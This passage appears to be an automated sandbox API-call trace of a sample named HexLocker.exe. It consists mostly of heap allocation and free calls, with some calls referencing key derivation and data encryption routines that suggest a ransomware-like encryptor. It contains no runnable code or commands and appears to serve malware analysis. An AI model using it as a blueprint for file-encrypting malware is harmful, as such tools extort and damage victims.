hHeap=0x970000) returned 1 [0121.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e570d0 | out: hHeap=0x970000) returned 1 [0121.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e57118 [0121.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2e) returned 0x2e57148 [0121.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e57088 [0121.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e57180 [0121.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976fa0 [0121.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57148 | out: hHeap=0x970000) returned 1 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e570a0 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e570d0 [0121.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57088 | out: hHeap=0x970000) returned 1 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e570b8 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e57088 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56e78 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56f38 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e57148 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56f08 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56ea8 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56f98 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56f50 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56f68 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56db8 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56d88 [0121.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57118 | out: hHeap=0x970000) returned 1 [0121.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e570d0 | out: hHeap=0x970000) returned 1 [0121.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e570a0 | out: hHeap=0x970000) returned 1 [0121.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e570b8 | out: hHeap=0x970000) returned 1 [0121.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57088 | out: hHeap=0x970000) returned 1 [0121.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56e78 | out: hHeap=0x970000) returned 1 [0121.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56f38 | out: hHeap=0x970000) returned 1 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa) returned 0x2e56e48 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56e30 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976fc0 [0121.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56e30 | out: hHeap=0x970000) returned 1 [0121.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976fc0 | out: hHeap=0x970000) returned 1 [0121.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56e48 | out: hHeap=0x970000) returned 1 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56dd0 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1e) returned 0x2e571b8 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56fc8 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e571e0 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x976eb0 [0121.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e571b8 | out: hHeap=0x970000) returned 1 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56e18 [0121.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e56f80 [0121.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56fc8 | out: hHeap=0x970000) returned 1 [0121.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56de8 [0121.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56e78 [0121.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56e30 [0121.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e571b8 [0121.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e56e00 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56dd0 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56f80 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56e18 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56de8 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56e78 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56e30 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ed8 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976fc0 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976ed0 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57208 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ff8 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56fe0 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976e40 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56e78 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57058 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56e30 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56fc8 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57010 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56dd0 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56f80 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ed8 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56fe0 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56e18 | out: hHeap=0x970000) returned 1 [0121.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56f80 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976e40 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ed8 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57208 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ed8 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56f80 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976e50 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56da0 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57338 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56e30 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57058 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56dd0 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56e18 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ed8 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56f80 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56da0 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56fe0 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56fc8 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57010 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56e30 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57010 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976e10 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976ed0 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56e18 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56dd0 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56fe0 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976d10 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56da0 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56fe0 | out: hHeap=0x970000) returned 1 [0121.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976d30 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57058 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57540 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976d50 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57208 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x979f70 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57768 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976db0 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e577b0 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56f80 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56fc8 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56e18 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56ed8 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56dd0 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56fe0 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57010 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57058 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56da0 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9769d8 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9769f0 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57a80 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57ab0 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e579f0 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57b08 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57ab0 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x979f70 | out: hHeap=0x970000) returned 1 [0121.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57960 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e579f0 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57a80 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57ab0 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e579c0 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57930 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57888 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e578b8 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57978 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976d00 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e579c0 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e579c0 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57768 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e579d8 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57930 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57780 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57948 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57810 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x976d20 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e578d0 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57208 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e578d0 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57608 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57948 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57810 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e57930 | out: hHeap=0x970000) returned 1 [0121.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e579d8 | out: hHeap=0x970000) returned 1 [0121.859] CloseHandle (hObject=0x288) returned 1 [0121.860] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", nBufferLength=0x104, lpBuffer=0x8cfa78, lpFilePart=0x4a7f50 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", lpFilePart=0x4a7f50*="HexLocker.exe") returned 0x25 [0121.864] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0121.864] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0121.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac30 [0121.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f140 [0121.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac48 [0121.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f040 [0121.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e791f8 [0121.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a58 [0121.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac30 [0121.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f080 [0121.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78f28 [0121.864] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0121.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac48 | out: hHeap=0x970000) returned 1 [0121.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f040 | out: hHeap=0x970000) returned 1 [0121.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e791f8 | out: hHeap=0x970000) returned 1 [0121.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f140 | out: hHeap=0x970000) returned 1 [0121.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79018 | out: hHeap=0x970000) returned 1 [0121.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e638 [0121.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e600 [0121.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f130 [0121.864] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0121.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e600 | out: hHeap=0x970000) returned 1 [0121.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f130 | out: hHeap=0x970000) returned 1 [0121.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac30 [0121.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7eff0 [0121.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac48 [0121.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f020 [0121.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac48 | out: hHeap=0x970000) returned 1 [0121.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78d98 [0121.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7ac48 [0121.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7c8b0 [0121.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e7da20 [0121.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76660 [0121.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac30 | out: hHeap=0x970000) returned 1 [0121.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e6a8 [0121.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b78 [0121.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f110 [0121.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e830 [0121.910] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0121.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78d98 | out: hHeap=0x970000) returned 1 [0121.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f020 | out: hHeap=0x970000) returned 1 [0121.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7c8b0 | out: hHeap=0x970000) returned 1 [0121.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7da20 | out: hHeap=0x970000) returned 1 [0121.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76660 | out: hHeap=0x970000) returned 1 [0121.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ac48 | out: hHeap=0x970000) returned 1 [0121.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e6a8 | out: hHeap=0x970000) returned 1 [0121.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7eff0 | out: hHeap=0x970000) returned 1 [0121.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e6a8 [0121.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0a0 [0121.910] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0121.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e6a8 | out: hHeap=0x970000) returned 1 [0121.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0a0 | out: hHeap=0x970000) returned 1 [0121.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76630 [0121.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f040 [0121.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f020 [0121.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e791d0 [0121.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0121.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76630 | out: hHeap=0x970000) returned 1 [0121.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e4b0 [0121.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977e18 [0121.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0121.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f120 [0121.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0121.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e670 [0121.911] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0121.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e791d0 | out: hHeap=0x970000) returned 1 [0121.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f020 | out: hHeap=0x970000) returned 1 [0121.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0121.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e4b0 | out: hHeap=0x970000) returned 1 [0121.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f040 | out: hHeap=0x970000) returned 1 [0121.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e4b0 [0121.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0b0 [0121.911] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0121.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e4b0 | out: hHeap=0x970000) returned 1 [0121.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0b0 | out: hHeap=0x970000) returned 1 [0121.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7efe0 [0121.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76660 [0121.912] RtlAllocateHeap 